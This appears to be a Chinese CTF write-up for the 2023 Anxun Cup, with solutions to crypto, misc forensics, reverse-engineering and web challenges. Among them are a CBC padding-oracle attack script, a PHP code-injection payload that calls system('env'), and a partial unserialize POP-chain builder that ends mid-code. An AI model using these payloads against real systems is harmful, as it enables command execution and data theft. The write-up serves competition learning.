
2023 第六届安洵杯 writeup

用户10781703
发布2023-12-25 09:22:32

CRYPTO

010101

漏洞点在

# Key-mangling step quoted from the challenge source: p1 gets one randomly
# chosen '1' cleared, p2 gets one position set to '1'.
# NOTE(review): the index for p2 is drawn from the '0' positions of p1, not
# of p2 (as quoted here; possibly a transcription slip in the writeup).
p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'
p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'

p1只是随机地把一个1的位置变成0,p2把一个0的位置随机变成1,直接逆回去即可

charon@root:~/Desktop$ nc 124.71.177.14 10001SHA256(XXXX + 46tr7JsAnftJaAj2):bb607c005123726d6b766c22aae953c9b940e577c6eee1834d58d7b4c8aed0bcGive Me XXXX:1sytPress 1 to get ciphertext16019317455682494995107595480323300301281684269012730701351084808534606861097128732387692056733235739412227197845372269245749475979859953325021664476734410014720575731925904251102442593366655668403990263995510181013967125954239625175574645528880102887522025817986086352977570193007925691015284660139223253228220926464455493650171833363306828825533183970870645343702260455069648577546810721443364714233897615935934061182371641485196971610941014551486749274990733592988218858582639685570222798909493131516292569896347886656702446663175379068445062433265887249121442843081298854979379309044313820236565465696783078902210984042378781107180522174145335181877185771417778786182565494016061073801247741867209575064278503975173367714279328270813546483805238498696044690583098990834784211919036346860413402581575433895652371104211107933523943509360601463071774985572704821763014944680693421537000199726125219694414715351566045540338629545939715947600874065078335187587078863350014327385920433498197661125807679619403475838017715901218100497835243145772103695402701587994437072004662725124293482700335262949601981312589614366480254708418472993474202513303919807797524074940590380140714449067896194906509099072762940779370480589405622367996909171011011001111001001011010001110110111000111001011100111111011010010111111001110011101010010111110100001001000100011101100001000010011110100000001101110111001111110010101100101011011000011101011110111010111010100101010010101100111011110111110111100011110010000101011110011001110111001111000010110010001111101110000100100110011000110111110110110110110000010100111101111110100100000111101011110000110001000101110100110101101000111011000010010001110011001010011111010100100111011111011011111000000000001100100110101011000000001001000011010010011001011010100000011111001010100101010001100
01110000000000100100001011110000111110000101100101110110010001000110010010110001011110100111001011001001000111110110001010100001110111000000010110100101011011011011101011000100001111001111111010100011101000001111001111100001000001011100101111010000000111101111101000010101110110110010000111011001010010110000011001100000000111011100111111010000110010101010001110100100001010100101011011101111111101010000000010111110111110001110011101101010011000010000000101100100010101110000000000010011010000100010111110100101001001010000000001111001110011110111110111110000000010011011010000100111110100010111010100110111001110000010110010010011010010101000001100101001111100100100111101100101101111000011101110101010101010101110010001011100011101111111001100100111011111011011110010001101100100010111100110100000000111111000101101000011101011010100011001010010110100110100010110111011010101111110100000000010000001011001101101000111100011010101101001101110101111100110010011010111001110000101000100010011100000010001111011100100101000001110110101001101011101101000000011001000011010010011001011101000010000110100101100010001101111100000010010101100011001010000010000000101101010001111001000010100000101110111000101110110100100010100110111000010110001010001010101101001000010011100000010010110000111011001000110110111000010111001000011000001001110000110000100010000111100111110000111110110001010011101110000001001111010100010101001000001010010100101101100000110100110001001100113639741957721452316976500773100864937092070232127542889772994773564014497673678846855074974390573154760588872825226516857739857722943445362351665244776632928074165700293157331795285773795044212555622984077281565861021014031785899405567882333479222154731086326424132166836545887300907286953530144770952091830545531131348306621103726659289579737156714463334440930922185072153960387877465278759796433396879455697305518063131565687468124683424824865462096245006793059295786127430254243848165932477966977300997290389723864051540498702842027
33894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581

exp

from gmpy2 import *
from Crypto.Util.number import *
from tqdm import *

# Values copied from the service session above: the modulus, the mangled
# 2048-bit string p (p1 || p2, 1024 bits each, one bit of each flipped by the
# snippet quoted above) and the ciphertext.
n=601931745568249499510759548032330030128168426901273070135108480853460686109712873238769205673323573941222719784537226924574947597985995332502166447673441001472057573192590425110244259336665566840399026399551018101396712595423962517557464552888010288752202581798608635297757019300792569101528466013922325322822092646445549365017183336330682882553318397087064534370226045506964857754681072144336471423389761593593406118237164148519697161094101455148674927499073359298821885858263968557022279890949313151629256989634788665670244666317537906844506243326588724912144284308129885497937930904431382023656546569678307890221098404237878110718052217414533518187718577141777878618256549401606107380124774186720957506427850397517336771427932827081354648380523849869604469058309899083478421191903634686041340258157543389565237110421110793352394350936060146307177498557270482176301494468069342153700019972612521969441471535156604554033862954593971594760087406507833518758707886335001432738592043349819766112580767961940347583801771590121810049783524314577210369540270158799443707200466272512429348270033526294960198131258961436648025470841847299347420251330391980779752407494059038014071444906789619490650909907276294077937048058940562236799690917
p='10110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011'
c=363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581

# Search that recovered the prime (left commented out, as in the writeup):
# flip one '0' of p1 back to '1' and one position of p2 back to '0' until the
# candidate divides n. Both index lists are built from p1, mirroring the
# quoted challenge snippet.
# p1=p[:1024]
# p2=p[1024:]
# pp1=[i for i, c in enumerate(p1) if c == '0']
# pp2=[i for i, c in enumerate(p1) if c == '1']
# print(pp1)
# for i in tqdm(pp1):
#     p1 = list(p[:1024])
#     p1[i]='1'
#     for j in pp2:
#         p2 = list(p[1024:])
#         p2[j]='0'
#         ppp=''.join(p1) + ''.join(p2)
#         ppp2=int(ppp,2)
#         if n%ppp2==0:
#             print(ppp2)
#             break

# p is rebound here to the prime that search printed.
p=23035125732261132358670499878109017381474612877560501678840135971884602002596362770042962719837871778607403423140553717636949563024173949672281747566044348211883894971758093237914208347253908009359914127501739323351540268777972140879841918587634194478383649138731012434783470970638093549174619359989933572268463391374193459608549354611510909253795420360095279545780658678412847237770763508515088914878492525553581261678529131687242421476753253431930293211570439334452217877146659650508457581300434519215816445425880176422556848574152119462509229109443358566019337029013527249995191088717060570352636009477629767659827
print(isPrime(p))
q=n//p
e = 0x10001
d=invert(e,(p-1)*(q-1))  # textbook RSA: d = e^-1 mod phi(n)
m=pow(c,d,n)
print(long_to_bytes(m))
b'D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}'

POA

CBC padding oracle attack

from pwn import *from hashlib import sha256import stringfrom pwnlib.util.iters import mbruteforceimport binasciir = remote("124.71.177.14",10010)
table = string.ascii_letters+string.digitsdef pow():    r.recvuntil("XXXX + ")    suffix = r.recv(16).decode("utf8")    r.recvuntil(":")    cipher = r.recvline().strip().decode("utf8")    proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() ==                        cipher, table, length=4, method='fixed')    r.sendline(proof)
pow()r.sendline('1')r.recvuntil('This is your flag: ')c=r.recvuntil('\n',drop=True)print('c=',c)iv = c[:32]cipher = c[32:]enc=binascii.unhexlify(cipher)iv=binascii.unhexlify(iv)print('enc=',enc)print('iv=',iv)pt = bytearray(b'\x00'*16)for make_pad_len in range(1, 17):    xored_iv = bytearray(16)    for i in range(16):        xored_iv[i] = iv[i] ^ pt[i]    index = 16-make_pad_len    for i in range(0x100):        _iv = bytearray(16)        for j in range(index, 16):            _iv[j] = xored_iv[j] ^ make_pad_len        _iv[index] = i        _iv = bytes(_iv.rjust(16, b'\x00'))+enc        ivv=_iv.hex()        r.sendline('2')        r.recvuntil('Please enter ciphertext:\n')        # print('tt=',len(tt))        print('ivv=',ivv)        r.send(str(ivv))        res=r.recvuntil('\n')        # print('res=',res)        if b'True' in res:            v = i ^ iv[index] ^ make_pad_len            pt[index] = v            print(chr(v), pt.hex(), bytes(pt))            breakr.interactive()
ivv= 10660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 11660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 12660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 13660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 14660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 15660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 16660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 17660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 18660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 19660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdM 4d467b305040643454746b7d04040404 b'MF{0P@d4Ttk}\x04\x04\x04\x04'[*] Switching to interactive mode
D0g3{0P@d4Ttk}

Rabin

第一步爆破x,获得r,从而n1=n//r=p*q

第二步注意到inv_p*p+inv_q*q=n1+1,再加上p*q=n1,可以求得p,q

第三步,爆破e2,根据p,q直接求d,解密第二部分m,验证前10个字符isprintable就可以爆破出,e2 为 5,第二部分40-a9e4-a67a9ba15345}

第四步,根据relation(),以及第一步,判断x比较可能是8,根据e2,爆破e1是2,rabin解密得到第一段D0g3{82309bce-9db6-53

最终flag:D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}

Python代码如下:

from Crypto.Util.number import *
from gmpy2 import *

# Challenge values: n = p*q*r, the two CRT inverses handed out by the task,
# and the two ciphertexts.
n = 285333097560579856892735567589027491455281816676548482904879584411084840450605271899236335787378212457644480538489333957199681005051324763317061914445335184643625612096862543286134102802857549376968548460142475231575293784694948584292852369440735047979684088368282494500434727138560870002195137014489167165627331632368455059106946492710112045617183371020744982960108917884038933243553293376828996387182739769132792122496876799056412450480295939241242493468339649702797915685408056205502660879129130498545921410634619659281124474952328520326377732861327885460825785663612083850698299251860568500798463658863076047273218029864658192865375924206328915181982984562250516942987232706349911392265126207255534866190377014380855435918220022982938162059864440683044775523888991188203006479911766073854154460130165113177584072109403534582913430806912608626570189230138578926612739070744683368688850886527094463667668825307246359436635233811527374246463299941661976846168659355118349992007638908363168630724274951
inv_p = 15518556384860245743478620429603192585685787953718242976660224479750998999124338822955414145628584896866254074982803409103638138579055846815417400924284717580342975268418607314979326166327341036902072011846895021125831579420772494902187900359222937225476944827334097644914928633555605528401231109679269995086
inv_q = 155844952786694191575297403428699000736198123964886234441336879931357938912183547278484904361669861403393518512602888045819050991788625527088116664969187555777028144199786402659623855374576202766323863308930997626431142188895581868394783999218343754370726823809671619460649473747905784816603565738974432428480
c1 = 126976144638062411994384099639219893719548652649797747968794241772829388392059131204549804095367482955713969969355185232593725760428681633925245739792469765283064470833596211603668120879365838887254328902988534426769340803326035688970033255868390278666156442829111587282507934612148101514683146219594379325568501808994038719784055659363522080979550015313702694077294838434724135616183144122907039758450363380287762050096893679619122349248941856699588431034712017310975233907480446137538753544059977757157457507646299200188974533402557530497781126307449150221146472482007846609714342333817505591830507656245367858711393207787365997909956902207542164544097922462033634018795680632571241102059887769247904527047628319436872644835675831505379779011242527097220466159871163455244971911311179106589058265977916423231213266773521104981166940713044082334510252946317916149089661406584941263677321406447326099096001132473765127971954144881177204994916711534164440380921197150440049304017047080659500777241740528
c2 = 146941331442564610016438819735547244506352704046774905613426284012869732747925710307265626766652735661835157362691409229558530888941189129960135439286471184689177437139594351730287457489682323200067610139473500557213628686488936379775312971741967583943854236936993185362784886957646210710012024839783323641398605391643544058597455541620941929330435766958836695050614733661967896963275403693970761214082313515330149780215334487889969179336091893274890943467738514867511025492419144817240630139160081094440537994689088123579690334770462633832325163789325881676740410159219779623129230840988303480150753783702883385763373756192046417120986761450383952686760580908911815204339547584815987309530429459803006137138710075476256076429790734381285100612579775390606666816783573924249773339782127155714010817196675330870127749087069339556243710348583718134476356016094530370196897414589976876765847625687561629780514239120563907981343926849715187507551839537984064153228278609868504300922982445067467503667611505

# Recovered in steps 1-2 of the notes above: r from the x**k - 1 search (the
# loop at the very end of this file), then p and q from
# inv_p*p + inv_q*q = n1 + 1 together with p*q = n1.
r=10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087
p=172734683184670521870728305371917464596062609133662457971030651681563614292692150176606848807534588267834112546004233695199322884456898046304537198440536833886920821550944800659049952451650465399792357613884244821145480278404875760748959392209037101099598435512738382399052937036823852468261051762813693137499
q=158711409682623467193918200983728047440421670534311259267841341750844583719487872424882600690624065414558783083519077629543263229349472283576912545178060245058165997332172994084313993698397899585980714769786106061192880855558784452710588701697475203159038487141201679925814406643761912866831915524057271725627
assert inv_p==invert(p,q)
assert inv_q==invert(q,p)
assert n==p*q*r
n1=n//r
#2 · 3^2 · 71
phi=(p-1)*(q-1)


def test(m):
    """Return 1 when every byte of m lies in 30..128 (roughly printable), else 0."""
    for i in m:
        if i<30 or i>128:
            return 0
    return 1


print(phi)


def relation(e1,e2):
    """Check the task's relation between the exponents:
    e1^0 + ... + e1^4 == e2^0 + e2^1 + e2^2 (8 - (2**2 - 1) == 5 terms)."""
    a, b = 0, 0
    for i in range(8 - (2**2 - 1)):
        a += pow(e1, i)
    for j in range(3):
        b += pow(e2, j)
    if a == b:
        return True
    return False


e1=2
e2=5
# Rabin decryption of c1: square roots mod p and mod q via the (p+1)/4
# exponent (assumes p, q ≡ 3 mod 4 — not checked here), combined with the
# CRT inverses into the four candidate roots; the readable one is the first
# half of the flag.
mp = pow(c1, (p + 1) // 4, p)
mq = pow(c1, (q + 1) // 4, q)
a = (inv_p * p * mq + inv_q * q * mp) % n1
b = n1 - int(a)
c = (inv_p * p * mq - inv_q * q * mp) % n1
d = n1- int(c)
for i in (a, b, c, d):
    print(long_to_bytes(i))
exit()

# Everything below the exit() above is unreachable: earlier stages of the
# solve kept for the record, in reverse order of use (the final loop is step 1).
exit()
# Candidate e1 values satisfying relation() for the chosen e2.
for i in range(1,600):
    if(relation(i,e2)):
        print(i)
exit()
#D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}
from tqdm import tqdm
# Step 3: try small e2, decrypt c2 with RSA over n1 and keep printable results.
for i in tqdm(range(4,6)):
    if gcd(i,phi)>1:
        continue
    d=invert(i,phi)
    m=pow(c2,d,n1)
    m=long_to_bytes(m)
    if b"}" in m[:30] and test(m[:10])==1:
        print(i,m)
exit()
# Step 1: for each base x, find the first power x**k with more than 1024 bits
# such that x**k - 1 is prime, and test whether it divides n (that is r).
for x in range(2,100):
    r = 2
    print("begin",x)
    while True:
        r = r * x
        if r.bit_length() > 1024 and isPrime(r - 1):
            r = r - 1
            break
    if n%r==0:
        print(x,r)

MISC

dacongのWindows

桌面flag3一串PBE

图片
图片

根据描述提示注册表,windows.registry.printkey拿到一串字符d@@Coong_LiiKEE_F0r3NsIc

图片
图片

aes解出flag3

图片
图片

document下secret.rar

图片
图片

rstudio恢复出来解压有点问题,用vol3

图片
图片

一堆空白

图片
图片

很明显的snow了

图片
图片

拿到flag2

图片
图片

提示music

图片
图片

dacong_like_listen下面一堆wav,听上去就很像sstv,一个一个试过去

39.wav拿到flag1

图片
图片

拼接flag

flag{Ar3_Th3Y_tHE_DddddAc0Ng_SIst3Rs????}

签到处

D0g3{We1come_TO_AXB_F1111@g}

Nahida

reverse jpg

图片
图片

文件尾

图片
图片

反复提到眼睛,猜测是silenteye。提示“那个你一直在寻找的答案,早已出现在你的旅途”,fuzz后发现密码就是题目名

图片
图片

dacongのsecret

png fft拿到第一个密码

图片
图片

同样套路,jpg文件尾reverse 压缩包

图片
图片

又要密码

回去看png,很明显19 chunk块长度小于0x10000,那么20 chunk块肯定是多余的(经测试删除后png不会少任何像素)

图片
图片

将19chunk块拿出来,补个png文件头(直接用题目png的文件头)

图片
图片

爆破一下宽高,860*123拿到key

图片
图片

解压后,一眼base64隐写

图片
图片
图片
图片

拿到pass,fuzz后是上一个jpg的jphs,拿到flag

图片
图片
图片
图片

疯狂的麦克斯

1.将docx文件转换为zip提取隐藏文件

图片
图片

2.将麦克斯的称号打开后解密零宽字符得到麦克斯的称号

图片
图片

3.将隐藏的txt文件打开后发现为一个列表,列表的末尾有一串密文

图片
图片

使用rot13(amount设为22)解密密文后得到THIS IS MKS DO YOU KNOW WHOAMI

图片
图片

4.将列表也进行同样的解密,根据题目描述,只要将列表每一个值进行base64编码,就可以在其中找到正确的压缩包密码

图片
图片

脚本如下

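import base64

# Candidate values from the hidden list. The writeup shows only the first
# three entries; the rest is elided in the original post (it was written as
# `'248199O'...]`, which does not parse).
lst = ['71132E', '328051N', '248199O']


def encrypt_string(string):
    """Return the base64 text of *string* after UTF-8 encoding.

    Kept under the writeup's name, but note this is base64 *encoding*, not
    encryption.
    """
    encoded_bytes = base64.b64encode(string.encode('utf-8'))
    return encoded_bytes.decode('utf-8')


# One encoded candidate per line, to be fed to the archive password search.
with open('output.txt', 'w', encoding='utf-8') as file:
    file.writelines(encrypt_string(value) + '\n' for value in lst)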

爆破

图片
图片

解压压缩包得到flag

图片
图片

REVERSE

MobileGo

libgojni.so的mobile_go_Checkflag函数完成加密,首先初始化随机数生成器,种子为2023

图片
图片

之后随机生成两个随机数并将其作为索引完成flag中字符位置的互换

图片
图片

解密脚本如下,首先通过Go语言生成伪随机数

  package main

  import (
      "fmt"
      "math/rand"
  )

  // Regenerates the index pairs the target derives from math/rand seeded with
  // 2023: 0x26 iterations, two Intn(0x26) draws each, printed as "[a,b],"
  // so the output can be pasted straight into the Python restore script.
  func main() {
      rng := rand.New(rand.NewSource(2023))
      const rounds = 0x26
      for round := 0; round < rounds; round++ {
          first := rng.Intn(rounds)
          second := rng.Intn(rounds)
          fmt.Printf("[%d,%d],", first, second)
      }
  }

然后从后往前还原,密文从Android的资源文件中提取

# Ciphertext as stored in the app's resources: the flag after 0x26 swaps.
flag=bytearray(b"49021}5f919038b440139g74b7Dc88330e5d{6")
# Index pairs in the order the target applied them (output of the Go program above).
key=[[11,14],[15,37],[24,18],[8,30],[6,9],[30,3],[29,9],[4,13],[13,24],[37,1],[28,28],[3,1],[23,22],[21,26],[7,19],[1,34],[37,17],[27,29],[31,30],[14,2],[35,34],[4,27],[9,3],[3,24],[30,29],[3,27],[14,25],[26,0],[4,28],[5,15],[9,9],[13,18],[24,3],[35,24],[36,27],[25,21],[11,4],[27,28]]
# A swap is its own inverse, so replaying the pairs backwards restores the flag.
for left, right in reversed(key):
    flag[left], flag[right] = flag[right], flag[left]
print(flag)

D0g3{4c3b5903d11461f94478b7302980e958}

你见过蓝色的小鲸鱼

通过IDA插件可知`BlowFish`加密算法,用户名作为密钥,提取密文后编写脚本解密

图片
图片
from Crypto.Cipher import Blowfish

# The username is the key (see the note above the listing).
key=b'UzBtZTBuZV9EMGcz'
# 16 ciphertext bytes = two Blowfish blocks; ECB, no padding.
enc=b"\x11\xA5\x1F\x04\x95\x50\xE2\x50\x8F\x17\xE1\x6C\xF1\x63\x2B\x47"
cipher = Blowfish.new(key, Blowfish.MODE_ECB)
print(cipher.decrypt(enc))
#QHRoZWJsdWVmMXNo

牢大想你了

反编译Assembly-CSharp.dll文件

其中GameManager.OnValueChanged对输入完成TEA加密

图片
图片

解密脚本如下

#include <string.h>
#include <stdio.h>

/* TEA decryption of one 64-bit block v[0..1] in place, 32 rounds with the
 * standard delta 0x9e3779b9 and the 128-bit key k[0..3]. */
static void tea_decrypt_block(unsigned int v[2], const unsigned int k[4])
{
  const unsigned int delta = 0x9e3779b9;
  unsigned int v0 = v[0];
  unsigned int v1 = v[1];
  unsigned int sum = delta * 32;
  for (int round = 0; round < 32; ++round)
  {
    v1 -= ((v0 << 4) + k[2]) ^ (v0 + sum) ^ ((v0 >> 5) + k[3]);
    v0 -= ((v1 << 4) + k[0]) ^ (v1 + sum) ^ ((v1 >> 5) + k[1]);
    sum -= delta;
  }
  v[0] = v0;
  v[1] = v1;
}

/* Decrypts the six TEA blocks taken from GameManager.OnValueChanged and
 * writes the plaintext bytes to stdout in memory order. */
int main(void)
{
  unsigned int Data[12] = { 3363017039U,      1247970816U,      549943836U,      445086378U,      3606751618U,      1624361316U,      3112717362U,      705210466U,      3343515702U,      2402214294U,      4010321577U,      2743404694U };
  /* 286331153 == 0x11111111, repeated four times */
  unsigned int key[4] = { 286331153,      286331153,      286331153,      286331153 };
  for (int i = 0; i < 12; i += 2)
  {
    tea_decrypt_block(&Data[i], key);
    /* same bytes the original emitted one %c at a time */
    fwrite(&Data[i], 1, 2 * sizeof(unsigned int), stdout);
  }
  return 0;
}

结果为 it_is_been_a_long_day_without_you_my_friend

你好,PE

找到关键代码,有点像CRC64

搜了个脚本一把梭

import struct
def decode_k(v):
    """Undo one step of the binary's shift/xor mixing on a 64-bit word.

    If the low bit is set, xor the constant back in before the right shift
    and restore bit 63 afterwards; otherwise the step is a plain right shift.
    (The writeup likens the forward transform to CRC64; it is not shown here.)
    """
    if not v & 1:
        return v >> 1
    return ((v ^ 0x54AA4A9) >> 1) | 0x8000000000000000
# Six little-endian 64-bit words the binary compares against, as one hex blob.
g_key = bytearray.fromhex(
    '4DB87629F5A99E595556B1C42F212C30B3797817A8EDF7DBE153F0DBE903515E09C100DFF096FCC1B5E6629501000000'
)
single_len = 8
g_output = [
    struct.unpack('<Q', g_key[offset:offset + single_len])[0]
    for offset in range(0, 6 * single_len, single_len)
]
def decode_j(v):
    """Apply decode_k 64 times — one step per bit of the 64-bit word."""
    remaining = 64
    while remaining:
        v = decode_k(v)
        remaining -= 1
    return v
# Reverse the 64-step transform on every word, then turn the words back into
# their little-endian bytes and join them into the flag text.
r = [decode_j(word) for word in g_output]
flag = [struct.pack('<Q', word).decode() for word in r]
print(''.join(flag))
#D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}

感觉有点点简单

主函数获取数据后进行魔改rc4和魔改base64加密

rc4魔改了sbox的大小和最后异或结果

base64魔改了表和位运算的操作

图片
图片

解密脚本

#include<stdio.h>#include<stdlib.h>#include<string.h>#define sboxSize 64
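/* Position of c in the custom alphabet base64_map (reverse lookup of the
 * modified table). Returns 0 for a character that is not in the table: the
 * original fell off the end of the function without returning a value,
 * which is undefined behaviour in C. */
unsigned char findPos(const unsigned char* base64_map, unsigned char c)
{
  size_t map_len = strlen((const char*)base64_map); /* hoisted: was recomputed every iteration */
  for (size_t i = 0; i < map_len; i++)
  {
    if (base64_map[i] == c)
      return (unsigned char)i;
  }
  return 0;
}

/* Decode code0, a string in the target's modified base64: a shuffled
 * 64-character alphabet and a non-standard bit layout (each output byte is
 * assembled from the 6-bit values as written below, not as RFC 4648 does).
 * '=' padding is honoured. Returns a NUL-terminated malloc'd buffer owned by
 * the caller, or NULL if allocation fails. Input shorter than one 4-character
 * group decodes to an empty string (the original indexed before the start of
 * the buffer and computed a negative length for such input). */
unsigned char* base64_decode(const unsigned char* code0)
{
  unsigned char* code = (unsigned char*)code0;
  unsigned char base64_map[65] = "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh";
  long len, str_len, flag = 0;
  unsigned char* res;
  len = (long)strlen((const char*)code);
  if (len < 4)
  {
    res = (unsigned char*)malloc(1);
    if (res != NULL)
      res[0] = '\0';
    return res;
  }
  /* flag = how many bytes the last group is short, from the '=' padding */
  if (code[len - 1] == '=')
  {
    if (code[len - 2] == '=')
    {
      flag = 1;
      str_len = len / 4 * 3 - 2;
    }
    else
    {
      flag = 2;
      str_len = len / 4 * 3 - 1;
    }
  }
  else
    str_len = len / 4 * 3;
  res = (unsigned char*)malloc(sizeof(unsigned char) * str_len + 1);
  if (res == NULL)
    return NULL;
  unsigned char a[4] = { 0 };

  /* full 4-character groups: a[] holds the table index of each input char */
  for (int i = 0, j = 0; j < str_len - flag; j += 3, i += 4)
  {
    a[0] = findPos(base64_map, code[i]);
    a[1] = findPos(base64_map, code[i + 1]);
    a[2] = findPos(base64_map, code[i + 2]);
    a[3] = findPos(base64_map, code[i + 3]);
    /* modified bit layout; standard base64 would be
     *   a0<<2 | a1>>4,  a1<<4 | a2>>2,  a2<<6 | a3 */
    res[j] = a[0] | ((a[1] & 0x3) << 6);
    res[j + 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);
    res[j + 2] = ((a[3] & 0x3f) << 2) | ((a[2] & 0x30) >> 4);
  }
  /* padded final group: same layout, one or two output bytes */
  switch (flag)
  {
  case 0: break;
  case 1:
  {
    a[0] = findPos(base64_map, code[len - 4]);
    a[1] = findPos(base64_map, code[len - 3]);
    res[str_len - 1] = a[0] | ((a[1] & 0x3) << 6);
    break;
  }
  case 2:
  {
    a[0] = findPos(base64_map, code[len - 4]);
    a[1] = findPos(base64_map, code[len - 3]);
    a[2] = findPos(base64_map, code[len - 2]);
    res[str_len - 2] = a[0] | ((a[1] & 0x3) << 6);
    res[str_len - 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);
    break;
  }
  }
  res[str_len] = '\0';
  return res;
}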
/* RC4 state, shrunk to sboxSize entries instead of the usual 256. */
unsigned char sbox[sboxSize] = { 0 };

/* Exchange the bytes at a and b (works when a == b). */
void swap(unsigned char* a, unsigned char* b)
{
  unsigned char held = *a;
  *a = *b;
  *b = held;
}

/* Key schedule: sbox starts as the identity 0..sboxSize-1 and is permuted
 * under the key repeated cyclically (RC4's KSA with the smaller box). */
void init_sbox(unsigned char key[], int keyLen)
{
  unsigned char repeated_key[sboxSize] = { 0 };
  for (int idx = 0; idx < sboxSize; idx++)
  {
    sbox[idx] = (unsigned char)idx;
    repeated_key[idx] = key[idx % keyLen];
  }
  int j = 0;
  for (int idx = 0; idx < sboxSize; idx++)
  {
    j = (j + sbox[idx] + repeated_key[idx]) % sboxSize;
    swap(&sbox[idx], &sbox[j]);
  }
}

/* Symmetric RC4 pass over data with the modified output step: the keystream
 * byte is read at an index that also mixes in (i ^ j) and is masked with
 * (i ^ j) before the xor. Encrypt and decrypt are the same call. */
void RC4_enc_dec(unsigned char data[], int dataLen, unsigned char key[], int keyLen)
{
  init_sbox(key, keyLen);
  unsigned char i = 0;
  unsigned char j = 0;
  for (unsigned int pos = 0; pos < dataLen; pos++)
  {
    i = (i + 1) % sboxSize;
    j = (j + sbox[i]) % sboxSize;
    swap(&sbox[i], &sbox[j]);
    unsigned char mix = i ^ j;
    data[pos] ^= mix & sbox[(mix + sbox[i] + sbox[j]) % sboxSize];
  }
}
/* Undo the two layers in reverse order: the custom base64 text from the
 * binary is decoded, then the 41 resulting bytes are passed through the
 * modified RC4 with the key "the_key_". */
int main(void)
{
  unsigned char BaseData[] = "6zviISn2McHsa4b108v29tbKMtQQXQHA+2+sTYLlg9v2Q2Pq8SP24Uw=";
  unsigned char* plain = base64_decode(BaseData);
  RC4_enc_dec(plain, 41, (unsigned char*)"the_key_", 8);
  printf("%s", plain);
  return 0;
}

WEB

what’s my name

图片
图片
?d0g3=’”]);}system(‘env’);;;;/*include&name=%00lambda_32

跑32次

easy_unserialize

<?php
// Stand-ins for the target's classes with the property names and private
// defaults the serialized payload has to carry; methods are not needed to
// build the object graph.
class Good{
    public $g1;
    private $gg2='*&';
}
class Luck{
    public $l1;
    public $ll2;
    private $md5=1131911;
    public $lll3;
}
class To{
    public $t1;
    public $tt2;
    public $arg1 = array("guangji"=>1);
}
class You{
    public $y1;
}
class Flag{ }
// Innermost object: two dynamic properties on Flag.
$F = new Flag;
$F->SplFileObject = "/FfffLlllLaAaaggGgGg";
$F->b = "";
// Nesting, outermost last: You -> Luck -> Good -> To -> Luck -> To -> Luck -> Flag.
$l2 = new Luck;
$l2->l1 = $F;
$t2 = new To;
$t2->t1 = $l2;
$l = new Luck;
